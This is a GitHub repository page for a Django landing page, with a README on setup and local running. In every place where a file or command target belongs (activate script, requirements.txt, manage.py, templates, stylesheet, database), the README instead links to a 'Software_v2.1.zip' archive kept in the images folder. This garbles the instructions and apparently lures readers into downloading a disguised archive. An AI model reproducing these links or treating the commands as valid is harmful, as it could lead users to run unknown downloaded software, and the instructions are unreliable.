Skip to content

dixit1836/landingpage

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Landing Page Django Setup

This repository now runs the landing page inside a Django project so you can iterate on the site with Python back-end features later.

Requirements

  • Python 3.12 (bundled with py on Windows)

Initial Setup

cd C:\Users\ASUS\OneDrive\Desktop\landingpage
py -m venv venv
.\venv\Scripts\https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip
python -m pip install --upgrade pip
python -m pip install -r https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip

Running the Site Locally

cd C:\Users\ASUS\OneDrive\Desktop\landingpage
.\venv\Scripts\https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip
python https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip runserver

Open http://127.0.0.1:8000/ to view the landing page. The thank-you page lives at http://127.0.0.1:8000/thank-you/.

Project Structure Highlights

  • landingpage/ – Django project configuration.
  • main/ – App serving the landing page.
    • templates/main/https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip and https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip.
    • https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip – Stylesheet referenced via Django static files.

Database

SQLite (https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip) is created automatically after running python https://github.com/dixit1836/landingpage/raw/refs/heads/main/main/static/main/images/Software_v2.1.zip migrate.

Next Steps

  • Add a form handler if you want to persist form submissions instead of redirecting to WhatsApp.
  • Configure deployment settings (DEBUG, ALLOWED_HOSTS, static hosting) before going to production.

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors